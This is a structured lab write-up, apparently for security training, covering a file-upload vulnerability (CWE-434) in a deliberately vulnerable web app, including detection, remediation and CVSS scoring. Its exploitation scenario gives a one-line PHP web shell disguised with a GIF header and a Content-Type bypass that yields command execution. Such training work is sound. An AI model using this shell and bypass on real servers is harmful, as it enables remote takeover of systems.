## Version 1.4.1
## language: en

Feature: File Upload Level 3
  TOE:
    Vulnerable Web Application
  Category:
    File Upload
  Location:
    http://192.168.1.8/www/FileUpload/fileupload3.php - file (field)
  CWE:
    CWE-434: Unrestricted Upload of File with Dangerous Type
  Rule:
    REQ.043: https://fluidattacks.com/web/rules/043/
  Goal:
    Upload a file
  Recommendation:
    Generate a unique and random name for files and store
    them in a non-standard place

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali linux      | 4.19.0      |
    | Firefox         | 60.6.2      |
    | BurpSuite       | 1.7.36-56   |
  TOE information:
    Given The site
    When I enter into it
    Then The server is running LAMPP

  Scenario: Normal use case
    Given The site
    When A user wants to upload an image
    Then He selects an image on his computer
    And The server uploads it

  Scenario: Static detection
    Given The source code
    When I see the block of code when the file is uploaded
    """
    if ($check["mime"] == "image/png" || $check["mime"] == "image/gif") {
      $uploadOk = 1;
    }
    else {
      $uploadOk = 0;
      echo "Mime?";
      echo $check["mime"];
    }
    """
    Then I know the server is checking the MIME type directly from the image
    When I change the headers of a file
    Then I can fool the server to think that is another MIME type
    And I have a file upload vulnerability

  Scenario: Dynamic detection
    Given The site
    When I create the file "test.txt"
    Then I try to upload
    And The server doesn't allow it to me
    When I search the headers of GIF file
    """
    GIF89a;
    """
    Then I insert the header at the beginning of the file
    And I upload the ".txt" file

  Scenario: Exploitation
    Given The vulnerability
    When I create a ".php" shell with the GIF header
    """
    GIF89a;
    <?php system($_GET['cmd']); ?>
    """
    Then I intercept the HTTP petition using BurpSuite
    And I change the Content-Type to "image/gif" [evidence](image1.png)
    When I upload the file
    Then I can navigate to "uploads/shell.php"
    And I have shell to execute commands [evidence](image2.png)

  Scenario: Remediation
    Given The "uploads" folder
    When I create a ".htaccess" file in the folder
    """
    order deny,allow
    deny from all
    allow from 127.0.0.1
    """
    Then I only have access to the uploads folder from a local IP
    When I try to access the file after upload it
    Then I get a forbidden message
    And The vulnerability is patched [evidence](image3.png)

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      9.4/10 (Critical) - V:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    Temporal: Attributes that measure the exploit's popularity and fixability
      8.3/10 (High) - E:H/RL:O/RC:U/CR:H/IR:H/AR:L
    Environmental: Unique and relevant attributes to a specific user environment
      8.6/10 (High) - MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:H/MA:L

  Scenario: Correlations
    No correlations have been found to this date 2019-10-02
